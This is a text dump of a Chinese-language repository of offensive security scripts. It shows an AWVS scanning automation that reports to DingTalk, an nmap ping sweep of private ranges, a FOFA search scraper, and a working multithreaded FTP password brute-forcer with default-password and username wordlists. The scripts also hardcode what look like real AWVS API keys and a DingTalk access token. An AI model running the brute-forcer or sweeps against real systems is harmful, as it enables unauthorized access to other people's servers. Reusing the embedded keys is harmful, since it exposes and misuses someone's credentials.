├── README.md ├── awvs自动扫描探测扫描状态推送钉钉 ├── cs.py ├── url.txt └── 状态.py ├── cs.py ├── fofa子域名探测 └── fofa.py ├── ftp爆破 ├── ftp用户密码破解.py ├── passwd.txt └── user.txt ├── qq机器人脚本 ├── a.py ├── biaoqingbao.py ├── cs.py ├── help.py ├── subdns.py └── tcpudp.py ├── shodan脚本 ├── API.txt └── 查询信息.py ├── sql注入 └── sql注入.py ├── 代理服务器自动化采集 └── 采代理服务器.py ├── 子域名探测 ├── dns.txt └── 字域名探测.py ├── 存活的主机.txt ├── 完美校园自动健康打卡脚本 ├── .screenshot2021-1001_19-24-06-472558.png ├── .screenshot2021-1001_19-26-21-361662.png └── mian.py ├── 局域网扫描 ├── cs.py └── 存活的主机.txt ├── 微信钉钉推送 ├── 公众号推送.py └── 钉钉推送.py └── 教育行业漏洞报告平台 ├── 学校名.txt └── 教育行业漏洞报告平台.py /README.md: -------------------------------------------------------------------------------- 1 | 2 | #### shodan信息收集 3 | 4 | ![](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/2021121211111.gif) 5 | 6 | #### FTP多线程爆破 7 | 8 | 9 | 10 | ![](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/202112112301.gif) 11 | 12 | 13 | 14 | #### 代理服务器采集 15 | 16 | ![](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/20211212111111.gif) 17 | 18 | #### 教育行业漏洞报告平台 19 | 20 | ![](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/202112110219.gif) 21 | 22 | 23 | 24 | #### fofa子域名探测 25 | 26 | ![](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/202112110230.gif) 27 | 28 | #### 子域名探测脚本 29 | 30 | ![dsadsa](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/202112101721.gif) 31 | 32 | #### sql注入 33 | 34 | 35 | 36 | 37 | ![](https://cdn.jsdelivr.net/gh/Zhao-sai-sai/Picture/202112121111.gif) 38 | -------------------------------------------------------------------------------- /awvs自动扫描探测扫描状态推送钉钉/cs.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | urllib3.disable_warnings() # 忽略https证书告警 4 | import json 5 | import time 6 | 7 | 8 | # host = "https://192.168.0.119:3443/api/v1/scans?l=2" 9 | # Api_Key="1986ad8c0a5b3df4d7028d5f3c06e936cf2dbc5df8ab94feda5e55423fd6f4fdc" 10 | # 11 | # headers = { 12 | # "X-Auth": Api_Key, 13 | # "Content-type": "application/json;charset=utf8" 14 | # } 15 | # 16 | # 17 | # response = requests.get(url=host, headers=headers, verify=False) 18 | # response = response.json() 19 | # processing=0 20 | # failed=0 21 | # completed=0 22 | # print(response) 23 | # for i in response['scans']: 24 | # print(i['current_session']['status']) 25 | # if i['current_session']['status']=="processing": 26 | # processing+=1 27 | # elif i['current_session']['status'] == "failed": 28 | # failed+=1 29 | # elif i['current_session']['status'] == "completed": 30 | # completed+= 1 31 | # print(f"在扫描中:{processing}个") 32 | # print(f"一共扫描失败:{failed}个") 33 | # print(f"一共扫描成功:{completed}个") 34 | # 35 | 36 | # http = "https://192.168.0.119:3443/api/v1/targets/372550b5-fa3b-4a2e-b44e-3c97839db26b/configuration" 37 | # Api_Key="1986ad8c0a5b3df4d7028d5f3c06e936cf2dbc5df8ab94feda5e55423fd6f4fdc" 38 | # headers = {"X-Auth": Api_Key, 39 | # "Content-type": "application/json;charset=utf8"} 40 | # datas = json.dumps({"proxy":{"enabled":True,"protocol":"http","address":"192.168.0.174","port":8080}}) 41 | # response = requests.patch(url=http, headers=headers, data=datas, verify=False) 42 | 43 | # print(response) 44 | 45 | 46 | 47 | class awvs(): 48 | 49 | # 钉钉推送 50 | def push_dingding_group(self,content): 51 | headers = {"Content-Type": "application/json"} 52 | # 消息类型和数据格式参照钉钉开发文档 53 | data = {"msgtype": "markdown", "markdown": {"title": "awvs 添加新的扫描"}} 54 | data['markdown']['text'] = content 55 | 56 | r = requests.post( 57 | "https://oapi.dingtalk.com/robot/send?access_token=3afda4969edf03f8195ed8a93345c974b5d979dcd4f8f2294199bdba02c8ad41", 58 | data=json.dumps(data), 59 | headers=headers) 60 | #print(r.text) 61 | 62 | # 设置代理 63 | def AWVS_Broker(self,target_id,Broker_Host,Broker_Port): 64 | Broker_url_api=self.host + f"/api/v1/targets/{target_id}/configuration" 65 | datas = json.dumps({"proxy": {"enabled": True, "protocol": "http", "address": Broker_Host, "port": int(Broker_Port)}}) 66 | response = requests.patch(url=Broker_url_api, headers=self.headers, data=datas, verify=False) 67 | if str(response) == "": 68 | return "- 设置代理成功!" 69 | else: 70 | return "- 设置代理失败!" 71 | 72 | 73 | # 设置扫描速度 74 | def AWVS_Velocity(self,target_id): 75 | speed_url_api = self.host + f'/api/v1/targets/{target_id}/configuration' 76 | datas = json.dumps({"scan_speed": "moderate"}) # slow(慢)、moderate(中)、fasts(快) 77 | response = requests.patch(url=speed_url_api, headers=self.headers, data=datas, verify=False) 78 | #print(target_id) 79 | if str(response) == "": 80 | return "- 扫描速度设置成功!" 81 | else: 82 | return "- 扫描速度设置失败!" 83 | 84 | 85 | 86 | # # 获取目标的target_id 87 | # def AWVS_targets(self): 88 | # r = requests.get(url=self.host+"/api/v1/targets", headers=self.headers, verify=False) 89 | # target_id = r.json() 90 | # for i in target_id["targets"]: 91 | # self.AWVS_Velocity(i.get("target_id")) 92 | 93 | # 添加扫描目标 94 | def AWVS_New(self): 95 | datas = json.dumps({'address': self.targeted, # address:需要扫描的url;以http或https开头 96 | 'description': '扫描备注', # description:扫描备注 97 | 'criticality': '10'}) # criticality:危险程度;范围:[30,20,10,0];默认为10 98 | 99 | response = requests.post(url=self.host+"/api/v1/targets", headers=self.headers, data=datas, verify=False) 100 | 101 | ifresponse = response 102 | response = response.json() 103 | if str(ifresponse)=="": 104 | print(self.targeted+":添加目标成功!") 105 | print(response["target_id"]) 106 | return response["target_id"] # 返回添加目标的target_id 107 | else: 108 | print(self.targeted+"添加目标失败!") 109 | 110 | # 启动扫描 111 | def AWVS_scans(self,target_id): 112 | 113 | datas = json.dumps( 114 | {'profile_id': '11111111-1111-1111-1111-111111111111', # 扫描类型 115 | 'schedule': {'disable': False, # 扫描时间设置 (默认即时) 116 | 'start_date': None, 117 | 'time_sensitive': False}, 118 | 'target_id': target_id} 119 | ) 120 | response = requests.post(url=self.host+"/api/v1/scans", headers=self.headers, data=datas, verify=False) 121 | if str(response)=="": 122 | return "- 扫描启动成功!" 123 | else: 124 | return "- 扫描启动失败!" 125 | 126 | # 记录扫描漏洞 127 | def leak(self): 128 | r = requests.get(url=self.host+"/api/v1/targets", headers=self.headers, verify=False) 129 | response = r.json() 130 | high = 0 # 记录高危漏洞 131 | medium = 0 # 记录中危漏洞 132 | low = 0 # 记录低危漏洞 133 | info = 0 # 信息性泄露漏洞 134 | for i in response['targets']: # 记录扫描漏洞 135 | try: 136 | high += i['severity_counts']['high'] 137 | except : 138 | high +=0 139 | try: 140 | medium += i['severity_counts']['medium'] 141 | except: 142 | medium +=0 143 | try: 144 | low += i['severity_counts']['low'] 145 | except: 146 | low +=0 147 | try: 148 | info += i['severity_counts']['info'] 149 | except: 150 | info += 0 151 | 152 | leak = f""" 153 | --------------- 154 | 高危漏洞:{high}个 155 | 156 | 中危漏洞:{medium}个 157 | 158 | 低危漏洞:{low}个 159 | 160 | 泄露漏洞:{info}个""" 161 | return leak 162 | # 扫描状态 163 | def Scan_status(self): 164 | r = requests.get(url=self.host+"/api/v1/targets", headers=self.headers, verify=False) 165 | response = r.json() 166 | Scan_the_target = [] # 记录扫描目标 167 | processing = 0 # 记录在扫描中 168 | failed = 0 # 记录扫描失败的 169 | completed = 0 # 记录扫描成功 170 | #print(response['targets']) 171 | for i in response['targets']: 172 | Scan_the_target.append(i['address']) 173 | if i['last_scan_session_status'] == "processing": 174 | processing += 1 175 | elif i['last_scan_session_status'] == "failed": 176 | failed += 1 177 | elif i['last_scan_session_status'] == "completed": 178 | completed += 1 179 | scan=f""" 180 | --------------- 181 | 在扫描中:{processing}个 182 | 183 | 一共扫描失败:{failed}个 184 | 185 | 一共扫描成功:{completed}个""" 186 | 187 | status={"Scanstatus":scan, 188 | "processing":processing} 189 | return status # 扫描状态和在扫描中的 190 | 191 | def main(self,host,Api_Key,targeted,remark,Broker_Host,Broker_Port): 192 | self.host=host # awvs地址 193 | self.remark=remark # 扫描备注 194 | self.targeted=targeted # 扫描目标 195 | self.Api_Key=Api_Key # awvs的api 196 | self.headers = {"X-Auth": Api_Key,"Content-type": "application/json;charset=utf8"} 197 | #self.AWVS_New() 198 | 199 | status=self.Scan_status() # 返回扫描状态和在扫描中的 200 | 201 | target_id = self.AWVS_New() # 添加扫描目标 返回添加目标的target_id 202 | 203 | leak=self.leak() # 扫描漏洞信息 204 | Velocity=self.AWVS_Velocity(target_id) # 设置扫描速度 返回成功失败 205 | Broker=self.AWVS_Broker(target_id,Broker_Host,Broker_Port) # 设置扫描速度 返回成功失败 206 | scans=self.AWVS_scans(target_id) # 启动扫描 返回成功失败 207 | print(scans) 208 | print(Broker) 209 | print(Velocity) 210 | status = self.Scan_status() # 10秒查看描状态和在扫描中的 211 | Scanstatus = status['Scanstatus'] # 扫描状态信息 212 | dingtalk = f""" 213 | AWVS 扫描: 214 | 215 | -------------- 216 | 217 | - 添加目标:{targeted} 218 | 219 | {Velocity} 220 | 221 | {Broker} 222 | 223 | {scans} 224 | 225 | {Scanstatus} 226 | 227 | {leak}""" 228 | print(dingtalk) 229 | self.push_dingding_group(dingtalk) 230 | time.sleep(500) # 暂停10秒 231 | 232 | if __name__ == '__main__': 233 | host = "https://192.168.5.241:3443" # awvs地址 234 | Api_Key="1986ad8c0a5b3df4d7028d5f3c06e936c1c858707f5714c26ad168cc818063c1c" # api 235 | remark="测试" # 备注 236 | Broker_Host="127.0.0.1" # 代理 237 | Broker_Port=1081 # 代理 238 | awvs=awvs() 239 | for targeted in open("url.txt"): 240 | print(targeted) 241 | targeted=targeted.strip() 242 | awvs.main(host,Api_Key,targeted,remark,Broker_Host,Broker_Port) -------------------------------------------------------------------------------- /awvs自动扫描探测扫描状态推送钉钉/url.txt: -------------------------------------------------------------------------------- 1 | http://www.zssnp.top 2 | http://zssnp.top 3 | http://www.zxxyedu.com 4 | https://www.baidu.com/ 5 | -------------------------------------------------------------------------------- /awvs自动扫描探测扫描状态推送钉钉/状态.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | urllib3.disable_warnings() # 忽略https证书告警 4 | import json 5 | import time 6 | def awvs(): 7 | http = "https://192.168.0.119:3443/api/v1/targets" 8 | Api_Key="1986ad8c0a5b3df4d7028d5f3c06e936cf2dbc5df8ab94feda5e55423fd6f4fdc" 9 | 10 | headers = { 11 | "X-Auth": Api_Key, 12 | "Content-type": "application/json;charset=utf8" 13 | } 14 | r = requests.get(url=http, headers=headers, verify=False) 15 | response=r.json() 16 | 17 | high=0 # 记录高危漏洞 18 | medium=0 # 记录中危漏洞 19 | low=0 # 记录低危漏洞 20 | info=0 # 信息性泄露漏洞 21 | for i in response['targets']: # 记录扫描漏洞 22 | high += i['severity_counts']['high'] 23 | medium += i['severity_counts']['medium'] 24 | low += i['severity_counts']['low'] 25 | info += i['severity_counts']['info'] 26 | 27 | 28 | print(f"高危漏洞:{high}个\n中危漏洞:{medium}个\n低危漏洞:{low}\n泄露漏洞:{info}") 29 | 30 | leak = f""" 31 | --------------- 32 | 高危漏洞:{high}个 33 | 34 | 中危漏洞:{medium}个 35 | 36 | 低危漏洞:{low}个 37 | 38 | 泄露漏洞:{info}个 39 | 40 | """ 41 | push_dingding_group(leak) 42 | time.sleep(1300) # 暂停10秒 43 | def push_dingding_group(content): 44 | headers = {"Content-Type": "application/json"} 45 | # 消息类型和数据格式参照钉钉开发文档 46 | data = {"msgtype": "markdown", "markdown": {"title": "xray 发现了新漏洞"}} 47 | data['markdown']['text'] = content 48 | 49 | r = requests.post("https://oapi.dingtalk.com/robot/send?access_token=3afda4969edf03f8195ed8a93345c974b5d979dcd4f8f2294199bdba02c8ad41", data=json.dumps(data), 50 | headers=headers) 51 | print(r.text) 52 | if __name__ == '__main__': 53 | while True: 54 | awvs() -------------------------------------------------------------------------------- /cs.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import threading 3 | import time 4 | import queue 5 | 6 | 7 | 8 | # 提取出来的结果保存起来 9 | def Searchresults(results_IP): 10 | Searchresults_document = open("存活的主机.txt", 'a', encoding='utf-8') # 打开文件写的方式 11 | Searchresults_document.write((results_IP+'\n')) # 写入 12 | Searchresults_document.close() # 关闭文件 13 | 14 | 15 | def scan(IP_range): 16 | 17 | while not IP_range.empty(): 18 | ip=IP_range.get() 19 | print(f"当前正在探测:{ip}") 20 | nm = nmap.PortScanner() 21 | nm.scan(hosts=ip,arguments = '-sP') 22 | 23 | hosts_list=[(x,nm[x]['status']['state']) for x in nm.all_hosts()] 24 | 25 | for host,status in hosts_list: 26 | 27 | print(f"{host}---{status}") 28 | 29 | Searchresults(host) 30 | 31 | def cs(IP_range): 32 | print(IP_range) 33 | time.sleep(1) # 暂停 1 秒 34 | 35 | def Thread(IP_range): 36 | threadpool = [] 37 | for _ in range(int(10)): 38 | Threads = threading.Thread(target=scan, args=(IP_range,)) 39 | threadpool.append(Threads) 40 | for th in threadpool: 41 | th.start() 42 | for th in threadpool: 43 | threading.Thread.join(th) 44 | 45 | if __name__ == '__main__': 46 | IP_192_range=[''] 47 | IP_172_range=[''] 48 | IP_10_2_range=[''] 49 | IP_10_1_range=[''] 50 | for i1 in range(77,256): 51 | #print(f"192.168.{i1}.0") 52 | 53 | IP_192_range.append(f"192.168.{i1}.1/24") 54 | #print(f"172.17.{i1}.0") 55 | IP_172_range.append(f"172.17.{i1}.1/24") 56 | #print(f"10.2.{i1}.0") 57 | IP_10_2_range.append(f"10.2.{i1}.1/24") 58 | #print(f"10.1.{i1}.0") 59 | IP_10_1_range.append(f"10.1.{i1}.1/24") 60 | ip = queue.Queue() 61 | for i in IP_10_2_range: 62 | ip.put(i) 63 | IP_range =ip 64 | Thread(IP_range) 65 | # for i2 in IP_range: 66 | # scan(i) -------------------------------------------------------------------------------- /fofa子域名探测/fofa.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from lxml import etree 3 | import base64 4 | import time 5 | 6 | 7 | 8 | # 如果搜索结果多执行 9 | def Multiple(Judge_page,coding,headers,Cookie,speed): 10 | print("搜索结果有" + Judge_page + "页") 11 | for all in range(1,int(Judge_page)): 12 | time.sleep(speed) 13 | print("现在提取是第"+str(all)+"页") 14 | html = requests.get('https://fofa.so/result?qbase64=' + coding+"&page="+str(all), headers=headers,cookies=Cookie) 15 | html = etree.HTML(html.text) 16 | divs = html.xpath(r'//span/a/@href') # 语法 17 | for i in divs: 18 | print(i) 19 | 20 | 21 | def interface():##界面 22 | print("---------------------------------------------------") 23 | print("\t _________ ____ __ __ \t\t") 24 | print("\t|__ / ___/ ___| / _| ___ / _| __ _ \t\t") 25 | print("\t / /\___ \___ \ | |_ / _ \| |_ / _` | \t\t") 26 | print("\t / /_ ___) |__) | | _| (_) | _| (_| | \t\t") 27 | print("\t/____|____/____/ |_| \___/|_| \__,_| \t\t\n\n") 28 | print("*fofa信息收集探测工具") 29 | print("*扫描速度快对方可能会屏蔽IP的") 30 | print("---------------------------------------------------") 31 | 32 | interface()##界面 33 | 34 | Cookie=input("Fofa登录后的值Cookie的fofa_token值:") 35 | speed=int(input("请输入扫描速度:")) 36 | #base64编码 37 | z=input("请输入要搜索的关键字:") 38 | coding=base64.b64encode(z.encode('utf-8')).decode("utf-8") 39 | 40 | 41 | Cookie= {'fofa_token': Cookie} 42 | headers = { 43 | "user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 44 | } 45 | 46 | print("你输入的是"+z) 47 | html=requests.get("https://fofa.so/result?qbase64="+str(coding),headers) 48 | html=etree.HTML(html.text) 49 | try: 50 | 51 | Judge_page=divs=html.xpath(r'//ul[@class="el-pager"]/li[last()]/text()') # 查看是否有页数 52 | 53 | 54 | if Judge_page: # 如果搜索结果多进行循环一个一个页面的读取 55 | Multiple(Judge_page[0],coding,headers,Cookie,speed) 56 | else: 57 | print("搜索结果就一页!") 58 | divs = html.xpath(r'//span[@class="aSpan"]//@href') # 探测IP 59 | service = html.xpath(r'//p[@class="listSpanCont"]/a/text()') # 用的服务器软件 60 | 61 | 62 | order=0 63 | for i in divs: 64 | print("服务器IP地址是" + str(i)+"服务器软件"+service[order]) 65 | order += 1 66 | 67 | except Exception as bc: 68 | 69 | print("出差了:"+str(bc)) 70 | -------------------------------------------------------------------------------- /ftp爆破/ftp用户密码破解.py: -------------------------------------------------------------------------------- 1 | import ftplib 2 | import sys 3 | import threading 4 | import queue 5 | 6 | 7 | 8 | # 多线程 9 | def Thread(ip,port,quantity): 10 | Thread=queue.Queue() 11 | for username in open('user.txt'): 12 | for password in open('passwd.txt'): 13 | username = username.replace('\n', '') 14 | password = password.replace('\n', '') 15 | diclist=username+'|'+password 16 | Thread.put(diclist) 17 | for i in range(int(quantity)):# 定义线程数 18 | Threads=threading.Thread(target=Log_in,args=(Thread,ip,port,)) 19 | Threads.start() 20 | 21 | 22 | 23 | 24 | # 破解 25 | def Log_in(Thread,ip,port): 26 | while not Thread.empty(): 27 | user_passwd=Thread.get() 28 | user_passwd=user_passwd.split('|') 29 | 30 | try: 31 | try: 32 | ftp=ftplib.FTP() # 33 | ftp.connect(str(ip),int(port))# 连接的目标ip和端口 34 | 35 | ftp.login(user_passwd[0],user_passwd[1]) # 输入密码 36 | 37 | print("破解成功正确:用户是"+user_passwd[0]+"密码是:"+user_passwd[1]) 38 | print(ftp.retrlines('list')) 39 | ftp.close() 40 | 41 | 42 | except ConnectionRefusedError: 43 | print("连接被拒绝\n*可能对方没有开启FTP服务\n*或者你的地址和端口错误") 44 | break 45 | except ftplib.error_perm: 46 | ftp.close() 47 | print("密码错误==用户:" + user_passwd[0] + " 密码:" + user_passwd[1]) 48 | 49 | 50 | 51 | def enter(): 52 | print(""" 53 | _____ _____ ____ 54 | | ___|_ _| _ \ 55 | | |_ | | | |_) | 56 | | _| | | | __/ 57 | |_| |_| |_| 58 | FTP服务器的爆破 59 | 注意:发生请求过多可能会对目标服务器扫挂,尽量不要太多线程 60 | 语法:python 文件名.py [ip] [端口] [线程数量] 61 | """) 62 | 63 | 64 | if __name__ == '__main__': 65 | enter() 66 | ip=sys.argv[1] 67 | port=sys.argv[2] 68 | quantity=sys.argv[3] 69 | print("线程数是"+str(quantity)) 70 | print("你输入的地址是"+ip+ "端口是" + port) 71 | Thread(ip,port,quantity) 72 | -------------------------------------------------------------------------------- /ftp爆破/passwd.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 1234567 3 | 12345678 4 | 123asdf 5 | Admin 6 | admin 7 | administrator 8 | asdf123 9 | backup 10 | root 11 | backupexec 12 | changeme 13 | clustadm 14 | cluster 15 | compaq 16 | default 17 | dell 18 | dmz 19 | domino 20 | exchadm 21 | exchange 22 | ftp 23 | gateway 24 | guest 25 | lotus 26 | money 27 | notes 28 | office 29 | oracle 30 | pass 31 | password 32 | password! 33 | password1 34 | print 35 | qwerty 36 | replicate 37 | seagate 38 | secret 39 | sql 40 | sqlexec 41 | temp 42 | temp! 43 | temp123 44 | test 45 | test! 46 | test123 47 | tivoli 48 | veritas 49 | virus 50 | web 51 | www 52 | KKKKKKK 53 | Aaren 54 | Aarika 55 | Aaron 56 | Aartjan 57 | Abagael 58 | Abagail 59 | Abahri 60 | Abbas 61 | Abbe 62 | Abbey 63 | Abbi 64 | Abbie 65 | Abby 66 | Abbye 67 | Abdalla 68 | Abdallah 69 | Abdul 70 | Abdullah 71 | Abe 72 | Abel 73 | Abigael 74 | Abigail 75 | Abigale 76 | Abra 77 | Abraham 78 | Abu 79 | Access 80 | Accounting 81 | Achal 82 | Achamma 83 | Action 84 | Ada 85 | Adah 86 | Adaline 87 | Adam 88 | Adan 89 | Adara 90 | Adda 91 | Addi 92 | Addia 93 | Addie 94 | Addons 95 | Addy 96 | Adel 97 | Adela 98 | Adelaida 99 | Adelaide 100 | Adele 101 | Adelheid 102 | Adelia 103 | Adelice 104 | Adelina 105 | Adelind 106 | Adeline 107 | Adella 108 | Adelle 109 | Adena 110 | Adeniyi 111 | Adey 112 | Adi 113 | Adiana 114 | Adie 115 | Adina 116 | Aditya 117 | Admin 118 | Adnan 119 | Adora 120 | Adore 121 | Adoree 122 | Adorne 123 | Adrea 124 | Adri 125 | Adria 126 | Adriaens 127 | Adrian 128 | Adriana 129 | Adriane 130 | Adrianna 131 | Adrianne 132 | Adrie 133 | Adrien 134 | Adriena 135 | Adrienne 136 | Advance 137 | Aeriel 138 | Aeriela 139 | Aeriell 140 | Afif 141 | Afke 142 | Afton 143 | Afzal 144 | Ag 145 | Agace 146 | Agata 147 | Agatha 148 | Agathe 149 | Agenia 150 | Aggi 151 | Aggie 152 | Aggy 153 | Agna 154 | Agnella 155 | Agnes 156 | Agnese 157 | Agnesse 158 | Agneta 159 | Agnola 160 | Agretha 161 | Ahmad 162 | Ahmed 163 | Ahmet 164 | Aida 165 | Aidan 166 | Aideen 167 | Aiden 168 | Aigneis 169 | Aila 170 | Aile 171 | Ailee 172 | Aileen 173 | Ailene 174 | Ailey 175 | Aili 176 | Ailina 177 | Ailis 178 | Ailsun 179 | Ailyn 180 | Aime 181 | Aimee 182 | Aimil 183 | Aindrea 184 | Ainslee 185 | Ainsley 186 | Ainslie 187 | Air 188 | Ajay 189 | Ajit 190 | Ajmal 191 | Ajoy 192 | Akemi 193 | Akihiko 194 | Akin 195 | Akio 196 | Akira 197 | Akram 198 | Akshay 199 | Al 200 | Aladin 201 | Alain 202 | Alaine 203 | Alameda 204 | Alan 205 | Alana 206 | Alanah 207 | Alane 208 | Alanna 209 | Alasdair 210 | Alastair 211 | Alayne 212 | Alb 213 | Albert 214 | Alberta 215 | Albertina 216 | Albertine 217 | Albina 218 | Albrecht 219 | Aldo 220 | Alec 221 | Alecia 222 | Aleda 223 | Aleece 224 | Aleen 225 | Alejandra 226 | Alejandrina 227 | Alena 228 | Alene 229 | Alese 230 | Alessandra 231 | Aleta 232 | Alethea 233 | Alev 234 | Alex 235 | Alexa 236 | Alexander 237 | Alexandra 238 | Alexandrina 239 | Alexandru 240 | Alexi 241 | Alexia 242 | Alexina 243 | Alexine 244 | Alexis 245 | Alf 246 | Alfi 247 | Alfie 248 | Alfons 249 | Alfonso 250 | Alfonzo 251 | Alfred 252 | Alfreda 253 | Alfredo 254 | Alfy 255 | Ali 256 | Alia 257 | Alica 258 | Alice 259 | Alicea 260 | Alicia 261 | Alida 262 | Alidia 263 | Alie 264 | Alika 265 | Alikee 266 | Alina 267 | Aline 268 | Alis 269 | Alisa 270 | Alisha 271 | Alison 272 | Alissa 273 | Alisun 274 | Alix 275 | Aliza 276 | Alka 277 | Alkarim 278 | Alla 279 | Allan 280 | Alleen 281 | Allegra 282 | Allen 283 | Allene 284 | Alli 285 | Allianora 286 | Allie 287 | Allina 288 | Allis 289 | Allisan 290 | Allison 291 | Allissa 292 | Allister 293 | Allix 294 | Allsun 295 | Allx 296 | Ally 297 | Allyce 298 | Allyn 299 | Allys 300 | Allyson 301 | Alma 302 | Almeda 303 | Almeria 304 | Almerinda 305 | Almeta 306 | Almira 307 | Almire 308 | Alnoor 309 | Aloise 310 | Aloisia 311 | Alok 312 | Alora 313 | Aloysia 314 | Alp 315 | Alparslan 316 | Alphen 317 | Alphonso 318 | Alpine 319 | Alstine 320 | Alta 321 | Altay 322 | Althea 323 | Alvaro 324 | Alvera 325 | Alverta 326 | Alvin 327 | Alvina 328 | Alvinia 329 | Alvira 330 | Alwyn 331 | Aly 332 | Alyce 333 | Alyda 334 | Alys 335 | Alysa 336 | Alyse 337 | Alysia 338 | Alyson 339 | Alyss 340 | Alyssa 341 | Amabel 342 | Amabelle 343 | Amalea 344 | Amalee 345 | Amaleta 346 | Amalia 347 | Amalie 348 | Amalita 349 | Amalle 350 | Amand 351 | Amanda 352 | Amandi 353 | Amandie 354 | Amandip 355 | Amando 356 | Amandy 357 | Amant 358 | Amara 359 | Amargo 360 | Amarjit 361 | Amata 362 | Amato 363 | Amber 364 | Amberly 365 | Ambur 366 | Ame 367 | Amelia 368 | Amelie 369 | Amelina 370 | Ameline 371 | Amelita 372 | America 373 | Ami 374 | Amie 375 | Amii 376 | Amil 377 | Amina 378 | Amir 379 | Amit 380 | Amitie 381 | Amity 382 | Amjad 383 | Ammamaria 384 | Ammar 385 | Amnish 386 | Amnon 387 | Amos 388 | Amour 389 | Amparo 390 | Amrik 391 | Amrish 392 | Amy 393 | Amye 394 | An 395 | Ana 396 | Anabal 397 | Anabel 398 | Anabella 399 | Anabelle 400 | Anader 401 | Analiese 402 | Analise 403 | Anallese 404 | Anallise 405 | Anand 406 | Anantha 407 | Anastasia 408 | Anastasie 409 | Anastassia 410 | Anatola 411 | Anatoli 412 | Anatoly 413 | Anda 414 | Andaree 415 | Andee 416 | Andeee 417 | Anderea 418 | Anders 419 | root 420 | Anderson 421 | Andi 422 | Andie 423 | Andra 424 | Andras 425 | Andre 426 | Andrea 427 | Andreana 428 | Andreas 429 | Andree 430 | Andrei 431 | Andrejs 432 | Andres 433 | Andrew 434 | Andria 435 | Andriana 436 | Andriette 437 | Andromache 438 | Andrzej 439 | Andy 440 | Anestassia 441 | Anet 442 | Anett 443 | Anetta 444 | Anette 445 | Ange 446 | Angel 447 | Angela 448 | Angele 449 | Angeles 450 | Angelia 451 | Angelica 452 | Angelie 453 | Angeliek 454 | Angelika 455 | Angelina 456 | Angeline 457 | Angelique 458 | Angelita 459 | Angelle 460 | Angelo 461 | Angie 462 | Angil 463 | Angus 464 | Angy 465 | Anhtuan 466 | Ania 467 | Anibal 468 | -------------------------------------------------------------------------------- /ftp爆破/user.txt: -------------------------------------------------------------------------------- 1 | Aaren 2 | Aarika 3 | Aaron 4 | Aartjan 5 | Abagael 6 | Abagail 7 | Abahri 8 | Abbas 9 | Abbe 10 | Abbey 11 | Abbi 12 | Abbie 13 | Abby 14 | Abbye 15 | Abdalla 16 | Abdallah 17 | Abdul 18 | Abdullah 19 | Abe 20 | Abel 21 | Abigael 22 | Abigail 23 | Abigale 24 | Abra 25 | Abraham 26 | Abu 27 | Access 28 | Accounting 29 | Achal 30 | Achamma 31 | Action 32 | Ada 33 | Adah 34 | Adaline 35 | Adam 36 | Adan 37 | Adara 38 | Adda 39 | Addi 40 | Addia 41 | Addie 42 | Addons 43 | Addy 44 | Adel 45 | Adela 46 | Adelaida 47 | Adelaide 48 | Adele 49 | Adelheid 50 | Adelia 51 | Adelice 52 | Adelina 53 | Adelind 54 | Adeline 55 | Adella 56 | Adelle 57 | Adena 58 | Adeniyi 59 | Adey 60 | Adi 61 | Adiana 62 | Adie 63 | Adina 64 | Aditya 65 | Admin 66 | Adnan 67 | Adora 68 | Adore 69 | Adoree 70 | Adorne 71 | Adrea 72 | Adri 73 | Adria 74 | Adriaens 75 | Adrian 76 | Adriana 77 | Adriane 78 | Adrianna 79 | Adrianne 80 | Adrie 81 | Adrien 82 | Adriena 83 | Adrienne 84 | Advance 85 | Aeriel 86 | Aeriela 87 | Aeriell 88 | Afif 89 | Afke 90 | Afton 91 | Afzal 92 | Ag 93 | Agace 94 | Agata 95 | Agatha 96 | Agathe 97 | Agenia 98 | Aggi 99 | Aggie 100 | Aggy 101 | Agna 102 | Agnella 103 | Agnes 104 | Agnese 105 | Agnesse 106 | Agneta 107 | Agnola 108 | Agretha 109 | Ahmad 110 | Ahmed 111 | Ahmet 112 | Aida 113 | Aidan 114 | Aideen 115 | Aiden 116 | Aigneis 117 | Aila 118 | Aile 119 | Ailee 120 | Aileen 121 | Ailene 122 | Ailey 123 | Aili 124 | Ailina 125 | Ailis 126 | Ailsun 127 | Ailyn 128 | Aime 129 | Aimee 130 | Aimil 131 | Aindrea 132 | Ainslee 133 | Ainsley 134 | Ainslie 135 | Air 136 | Ajay 137 | Ajit 138 | Ajmal 139 | Ajoy 140 | Akemi 141 | Akihiko 142 | Akin 143 | Akio 144 | Akira 145 | Akram 146 | Akshay 147 | Al 148 | Aladin 149 | Alain 150 | Alaine 151 | Alameda 152 | Alan 153 | Alana 154 | Alanah 155 | Alane 156 | Alanna 157 | Alasdair 158 | Alastair 159 | Alayne 160 | Alb 161 | Albert 162 | Alberta 163 | Albertina 164 | Albertine 165 | Albina 166 | Albrecht 167 | Aldo 168 | Alec 169 | Alecia 170 | Aleda 171 | Aleece 172 | Aleen 173 | Alejandra 174 | Alejandrina 175 | Alena 176 | Alene 177 | Alese 178 | Alessandra 179 | Aleta 180 | Alethea 181 | Alev 182 | Alex 183 | Alexa 184 | Alexander 185 | Alexandra 186 | Alexandrina 187 | Alexandru 188 | Alexi 189 | Alexia 190 | Alexina 191 | Alexine 192 | Alexis 193 | Alf 194 | Alfi 195 | Alfie 196 | Alfons 197 | Alfonso 198 | Alfonzo 199 | Alfred 200 | Alfreda 201 | Alfredo 202 | Alfy 203 | Ali 204 | Alia 205 | Alica 206 | Alice 207 | Alicea 208 | Alicia 209 | Alida 210 | Alidia 211 | Alie 212 | Alika 213 | Alikee 214 | Alina 215 | Aline 216 | Alis 217 | Alisa 218 | Alisha 219 | Alison 220 | Alissa 221 | Alisun 222 | Alix 223 | Aliza 224 | Alka 225 | Alkarim 226 | Alla 227 | Allan 228 | Alleen 229 | Allegra 230 | Allen 231 | Allene 232 | Alli 233 | Allianora 234 | Allie 235 | Allina 236 | Allis 237 | 